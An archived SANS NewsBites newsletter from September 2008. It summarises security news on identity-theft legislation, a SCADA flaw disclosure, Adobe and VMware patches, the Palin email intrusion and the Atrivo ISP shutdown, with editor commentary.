Back to newsletter listDate:
Tue, September 23, 2008 03:35:05 PMFrom:
The SANS Institute
Subject:
SANS NewsBites Vol. 10 Num. 75
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
*************************************************************************
SANS NewsBites September 23, 2008 Vol. 10, Num. 75
*************************************************************************
TOP OF THE NEWS
Stronger Identity Theft Act Awaits Presidential Signature
Nevada Data Encryption Law Takes Effect October 1
North Carolina to Use Scanners to Ensure Voters Receive Proper Ballots
Survey Shows Two-Thirds of Organizations Have Experienced Cyber Attacks
THE REST OF THE WEEK'S NEWS
ARRESTS, CHARGES & CONVICTIONS
Former State Dept. Intelligence Analyst Pleads Guilty to Passport
File Snooping
VULNERABILITIES
Citect Acknowledges Seriousness of SCADA Flaw
Clickjacking Talk Cancelled
UPDATES AND PATCHES
Adobe Will Fix Clipboard Vulnerability in Flash 10
VMware Issues Fixes for Critical Buffer Overflow Flaws
ATTACKS
Palin eMail Attack Linked to Tennessee College Student
Palin Should Not Have Used Unsecure eMail for State Business
Communication
MISCEL***OUS
Network Provider's Negative Reputation is its Downfall
Apple's Patching Process Debated
******************** Sponsored By Palo Alto Networks ********************
Attention Cisco PIX Users: Now that Cisco announced "end of life" for
its PIX Security Appliances, consider a transition to award-winning next
generation firewalls from Palo Alto Networks. Get unprecedented
visibility and control of all applications, users, and content -and get
instant rebates of up to $6,000! Learn more, watch this short webcast.
http://www.sans.org/info/33404
*************************************************************************
TRAINING UPDATE
- - NETWORK SECURITY 2008: Las Vegas (9/28-10/6) 50 courses; big security
tools expo; lots of evening sessions: http://www.sans.org/ns2008/
- - Monterey (10/31-11/6) http://www.sans.org/info/30738
- - Sydney Australia (10/27-11/1) http://www.sans.org/sydney08/
- - Vancouver (11/17-11/22) http://www.sans.org/vancouver08/
and in 100 other cites and on line any time: www.sans.org
*************************************************************************
TOP OF THE NEWS
--Stronger Identity Theft Act Awaits Presidential Signature
(September 17 & 20, 2008)
The Identity Theft Enforcement and Restitution Act of 2008 has been
approved by both houses of US legislature and now goes before the
president to be signed into law. The bill clarifies what constitutes
identity and information theft and increases the penalties for those
found guilty. The act does away with the minimum level of damages
required for charges to be filed against information thieves. In
addition, victims of identity theft would have the right to sue the
culprits for restitution.
http://www.vnunet.com/vnunet/news/2226560/identity-theft-bill-set
http://www.eweek.com/c/a/Security/Congress-Approves-Computer-Fraud-Bill/
--Nevada Data Encryption Law Takes Effect October 1
(September 19, 2008)
A Nevada law requiring that businesses encrypt all transmissions of
personal, identifiable information over the Internet becomes enforceable
as of October 1, 2008. An attorney who has been keeping a close eye on
the issue has expressed concern that the statute is overly broad in its
definition of what constitutes encryption, does not address industry
standards, and is not clear about how those who violate the law will be
penalized.
http://blog.baselinemag.com/bottom_line/content/security/nevada_deadline_on_email_encryption_looming.html
[Editor's Note (Schultz): Interestingly, many of the criticisms of this
law have also previously been leveled against SB 1386. SB 1386
nevertheless has had a huge impact on data security notification in most
states within the US.]
--North Carolina to Use Scanners to Ensure Voters Receive Proper Ballots
(September 19, 2008)
This November, voters in North Carolina will have an increased level of
confidence that they are receiving the correct ballot on which to record
their votes thanks to the use of scanners. The state uses more than 100
different ballots; voters in North Carolina mark their choices directly
on their ballots. Poll workers will scan each voter's voter
authorization form as well as the associated ballot; the process should
catch any anomalies. The scanners were tested in several municipalities
in the state's May primary election and will be used in all precincts
in November's election.
http://www.informationweek.com/shared/printableArticle.jhtml?articleID=210602730
--Survey Shows Two-Thirds of Organizations Have Experienced Cyber Attacks
(September 22, 2008)
According to the US Department of Justice's 2005 National Computer
Security Survey, over two-thirds of the more than 7,800 companies
responding to the survey experienced at least one cybercrime incident
during that year. The incidents were classified as cyber attacks, cyber
theft, or other. Three-fourths of the cyber attacks originated from
outside the organizations; the same percentage of cyber thefts
originated from within the organizations. More than half of the cyber
thefts were reported to authorities, while just six percent of cyber
attacks were reported.
http://www.securityfocus.com/brief/825
The actual survey results: http://www.ojp.usdoj.gov/bjs/pub/pdf/cb05.pdf
************************** Sponsored Links: ***************************
1) Join your peers and other professionals at the Forensics & Incident
Response Summit October 13-14.
http://www.sans.org/info/33409
2) ALERT: Forrester Webcast: Web 2.0 Browser Exploits- What Hackers know
that you don't
http://www.sans.org/info/33414
*************************************************************************
THE REST OF THE WEEK'S NEWS
ARRESTS, CHARGES & CONVICTIONS
--Former State Dept. Intelligence Analyst Pleads Guilty to
Passport File Snooping
(September 17 & 22, 2008)
A former US State Department intelligence analyst has pleaded guilty to
unauthorized access to a State Department computer for snooping on
passport records of well known people. Lawrence Yontz could face up to
a year in prison for accessing the files, which include those of major
players in the current presidential race. A recent audit found "a
general lack of policies, procedures, guidance and training" at the
State Department's passport bureau. Yontz admitted to having perused
the files of approximately 200 well-known individuals and their
families; he will cooperate with the government's continuing
investigation.
http://blog.wired.com/27bstroke6/2008/09/idle-curiosity.html
http://www.cnn.com/2008/POLITICS/09/16/passport.snooping/
VULNERABILITIES
--Citect Acknowledges Seriousness of SCADA Flaw
(September 19, 2008)
Citect has replaced its advisory about a flaw in its CitectSCADA
(Supervisory Control and Data Acquisition) software. The original
advisory downplayed the seriousness of the flaw, but after exploit code
for the flaw was published last week, the company replaced the advisory
with a more strongly worded version. The person who released the code,
said he did so because he did not believe Citect was taking the threat
seriously enough; he is pleased that the company has acknowledged the
severity of the flaw. Citect released a patch for the flaw in June
2008.
http://www.theregister.co.uk/2008/09/19/scada_advisory_pulled/
http://www.citect.com/documents/news_and_media/CitectSCADA-security-response.pdf
[Editor's Note (Skoudis): Sadly, SCADA vendors usually have to be forced
into disclosing the significance of security flaws and the importance
of their patches. As an industry, we really need to keep the pressure
on the SCADA vendors for quickly and thoroughly fixing flaws, and then
warning their customers about the issue. If your organization relies
on SCADA devices for your operations, make sure your security personnel
are in touch with your main SCADA vendors to get vulnerability
information in a timely fashion.
(Debate) A small difference of opinion arose among NewsBites editors
on whether to list the name of the person who disclose the vulnerability
"because he did not believe [the vendor] was taking the threat seriously
enough." Editor and security pioneer, Marcus Ranum, had the last word:
The people who do exploit and vuln releases do it for attention. Naming
them in newsbytes plays right into their hands; I generally recommend
that we not reward disclosure, as a matter of policy. Feed cockroaches
and you just get more cockroaches.]
--Clickjacking Talk Cancelled
(September 19, 2008)
A talk on a type of vulnerability dubbed "clickjacking" scheduled to be
delivered at the OWASP Conference has been cancelled. The people
presenting the talk became concerned that the flaws are serious enough
that it would be irresponsible to disclose them without first giving
vendors time to fix them. The experts scheduled to give the talk have
contacted vendors whose products are believed to be vulnerable to the
type of exploit they had planned to speak about. "Clickjacking"
involves a number of flaws that could be exploited to trick users into
clicking on a link that is never or perhaps only briefly visible.
http://www.heise-online.co.uk/security/Is-clickjacking-the-next-threat--/news/111570
http://ha.ckers.org/blog/20080915/clickjacking/
[Editor's Note (Skoudis): Kudos to Rsnake and Jeremiah Grossman for
acting responsibly here and explaining so clearly their reasons for
doing so. They have set an effective standard for us all.]
UPDATES AND PATCHES
--Adobe Will Fix Clipboard Vulnerability in Flash 10
(September 22, 2008)
Adobe Systems Inc. says it will fix a vulnerability in Flash when it
releases the next version of Flash 10. The flaw has been actively
exploited to place URLs that link to malicious websites on users'
clipboards. The new version of Flash will lock the setClipboard command
so that it can only be called through user initiated action; remote
calls will not be allowed. The availability date for the fix is not
known.
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9115269&source=rss_topic17
http://www.heise-online.co.uk/security/Adobe-to-prevent-clipboard-attacks-via-Flash-Player--/news/111581
http://www.adobe.com/devnet/flashplayer/articles/fplayer10_security_changes.html
http://labs.adobe.com/technologies/flashplayer10/
--VMware Issues Fixes for Critical Buffer Overflow Flaws
(September 19 & 22, 2008)
VMware has released patches to address two buffer overflow
vulnerabilities in some of its products. The flaws affect the openwsman
component in ESXi and ESX 3.5 and could be exploited to allow remote
code execution. VMware also released two other patches to address
additional vulnerabilities in libpng, bind, net-snmp and perl for ESX
3.5 servers.
http://www.theregister.co.uk/2008/09/19/vmware_critical_vuln_patched/print.html
http://www.zdnetasia.com/news/security/0,39044215,62046380,00.htm
http://www.vmware.com/security/advisories/VMSA-2008-0015.html
[Editor's Note (Veltsos): As organizations increase their deployment
of virtual environments, attackers will focus on weaknesses in
virtualization technology implementations. The security community has
already pointed out the limitations and problems one faces when running
firewalls, IDS/IPS, or incident response in virtual environments.
http://www.cio.com/article/360713/Today_s_Virtualization_Security_Tools_One_Hidden_Risk_?contentId=360713&slug]
ATTACKS
--Palin eMail Attack Linked to Tennessee College Student
(September 21 & 22, 2008)
The FBI has served a warrant at the apartment of a University of
Tennessee student who is believed to be involved with the intrusion into
Governor Sarah Palin's Yahoo! email account. No charges have yet been
filed, but three roommates of the man under suspicion, David Kernell,
have been served with court summonses. Kernell was pegged as a possible
culprit when his email address was linked to a posting to a bulletin
board about having broken into Palin's account. The man who runs
Ctunnel, a proxy service that was used by the attacker, initially said
the IP address information he has regarding the attack does not point
to Kernell. However, he has since acknowledged that the IP address used
to break into the account was traced to an Illinois-based internet
service provider (ISP) that provides service to the housing complex
where Kernell lives.
http://www.theregister.co.uk/2008/09/22/palin_hack_suspect_search_warrant/print.html
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9115238&source=rss_topic17
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9115289&source=rss_topic17
http://blog.wired.com/27bstroke6/2008/09/fbi-raid-apartm.html
--Palin Should Not Have Used Unsecure eMail for State Business
Communication
(September 22, 2008)
Government Computer News (GCN) columnist William Jackson does not
dispute that breaking into Governor Palin's email account was wrong, but
also observes that Palin should have known better than to use unsecured
email accounts to conduct state business, ostensibly to prevent the
communications from being subject to disclosure laws.
http://www.gcn.com/online/vol1_no1/47187-1.html?topic=security&page=1
MISCEL***OUS
--Network Provider's Negative Reputation is its Downfall
(September 22, 2008)
California based network provider Intercage, also known as Atrivo, has
had its last upstream Internet provider pull the plug after coming under
fire for supplying service to the company that has been branded a source
of malware on the Internet. Atrivo had reportedly been turning a blind
eye to spammers and other Internet malware purveyors who were its
clients. After reports surfaced in the media several weeks ago about
the prevalence of malware emanating from the Atrivo network, most of its
upstream providers severed their business relationships with the
company. The last remaining provider was pushed to the brink after
Spamhaus blacklisted more than 1,000 of its IP addresses. Once the
provider, Pacific Internet Exchange (PIE), stopped providing Atrivo with
service, Spamhaus removed virtually all of the blocks. Atrivo president
and owner Emil Kacperski says he is being treated unfairly and that he
received an average of just five complaints a week about malicious
domains on his network. While the community is in agreement that
consistently problematic customers need to be dealt with, some have
voiced the opinion that what occurred with Atrivo was the equivalent of
vigilante justice.
http://voices.washingtonpost.com/securityfix/2008/09/internet_shuns_us_based_isp_am.html?nav=rss_blog
http://www.theregister.co.uk/2008/09/22/intercage_goes_dark/print.html
--Apple's Patching Process Debated
(September 22, 2008)
A number of security experts have said that Apple's unpredictable
patching process is problematic, possibly putting companies in a
position to decide not to patch because they don't know when the next
one will be coming. Others say that it is unfair to compare Apple to
Microsoft, which releases patches on a predictable schedule; instead,
it should be compared to other Unix vendors. In addition, Apple's
tendency to issue patches as soon as they become available gives
attackers a smaller window of opportunity than does Microsoft.
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9115288&intsrc=hm_ts_head
[Editor's Note (Skoudis): I understand the arguments of both sides, but
I really would prefer to see more predictable patch releases from Apple,
which would greatly help operations in the enterprise space. Also, it
seems to me that the comparison with Unix hardly matters if Apple is
gunning for higher market share on corporate desktops by grabbing market
share from Windows.]
*************************************************************************
The Editorial Board of SANS NewsBites
Eugene Schultz, Ph.D., CISM, CISSP is CTO of High Tower Software and the
author/co-author of books on Unix security, Internet security, Windows
NT/2000 security, incident response, and intrusion detection and
prevention. He was also the co-founder and original project manager of
the Department of Energy's Computer Incident Advisory Capability (CIAC).
John Pescastore is Vice President at Gartner Inc.; he has worked in
computer and network security since 1978.
Stephen Northcutt founded the GIAC certification and currently serves
as President of the SANS Technology Institute, a post graduate level IT
Security College, www.sans.edu.
Johannes Ullrich is Chief Technology Officer of the Internet Storm Center.
Howard A. Schmidt served as CSO for Microsoft and eBay and as Vice-Chair
of the President's Critical Infrastructure Protection Board.
Ed Skoudis is co-founder of Intelguardians, a security research and
consulting firm, and author and lead instructor of the SANS Hacker
Exploits and Incident Handling course.
Tom Liston is a Senior Security Consultant and Malware Analyst for
Intelguardians, a handler for the SANS Institute's Internet Storm
Center, and co-author of the book Counter Hack Reloaded.
Dr. Eric Cole is an instructor, author and fellow with The SANS
Institute. He has written five books, including Insider Threat and he
is a senior Lockheed Martin Fellow.
Mason Brown is one of a very small number of people in the information
security field who have held a top management position in a Fortune 50
company (Alcoa). He is leading SANS' global initiative to improve
application security.
Marcus J. Ranum built the first firewall for the White House and is
widely recognized as a security products designer and industry
innovator.
Mark Weatherford, CISSP, CISM, is Executive Officer of the California
Office of Information Security and Privacy Protection.
Alan Paller is director of research at the SANS Institute
Clint Kreitner is the founding President and CEO of The Center for
Internet Security.
Brian Honan is an independent security consultant based in Dublin, Ireland.
Dr. Christophe Veltsos, CISSP, CISA, GCFA teaches Information Security
courses at Minnesota State University, Mankato. He is the President of
Prudent Security LLC and also serves as the President of the Mankato
Chapter ISSA.
Please feel free to share this with interested parties via email, but
no posting is allowed on web sites. For a free subscription, (and for
free posters) or to update a current subscription, visit
http://portal.sans.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAkjZFkcACgkQ+LUG5KFpTkaC1QCfXaOOKyea0nEDRPptgEeC4eOj
f9YAnjrU3dZcp12Xipq7oFHdB7MLmVwX
=AS6H
-----END PGP SIGNATURE-----
